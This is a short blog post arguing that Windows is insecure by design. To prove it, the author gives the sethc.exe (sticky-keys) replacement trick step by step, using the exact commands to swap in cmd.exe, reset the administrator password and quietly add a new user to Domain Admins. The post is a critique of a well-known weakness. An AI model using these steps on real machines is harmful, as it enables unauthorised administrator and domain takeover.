August 25, 2020 | 08:00

Windows is broken by design

Feedbacks to my recently written blog “Working in Homeoffice Part I”:

No Tomas, you can’t say you believe Windows is broken by design, bashing everybody up in the face.

or:

It’s not that simple getting privileges on windows computers.

Well, how to put it right? Perhaps by explaining how easy and quickly you can become an administrator on Windows 7 or Windows 2008R2 server? Without knowledge of any login data at all?

  • Booting with WinPE Medium or into the rescue console
  • identify the correct system partition with diskpart
  • Copy cmd.exe into sethc.exe with a one-liner and confirm the security query with Y(es):
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe 

After rebooting the system, simply press the Shift key 5x times and confirm the prompt with Yes. Voila, we are back in the game standing at 5:1 in the 85th minute:

cmd.exe aka sethc.exe in action

We’re just one line away from the administrator’s password:

net user administrator YOURNEWPASSWORDHERE

Which would be rather “noisy” from a hacker’s perspective. Better create an unimpressive user and push him directly into one of the admin groups:

net user mueller YOURNEWPASSWORDHERE /add
net group "Domain Admins" mueller /add

The worst thing about this: It is neither new nor unknown. The fundamental logic behind has been the same for 25 years: Just replace anything with the CMD.EXE (COMMAND.COM also worked). In NT4 it was the LOGON screensaver, with XP the on-screen keyboard, with Win7 and 2008 as seen above SETHC.EXE, with Windows 2012 Server it’s UTILMAN.EXE, with Windows 10 and 2016 Server it is a bit more complicated but still basically same in principle. And no, I won’t reveal that here ;-)

Other systems ask for encryption during installation, Windows requires manual and complicated activation though. The result: Nobody does.

This is why I consider Windows as broken by design. It trains its users and in the end all those typical Windows administrators to mediocrity.

© 2020 Tomas Jakobs - Imprint and Legal Notice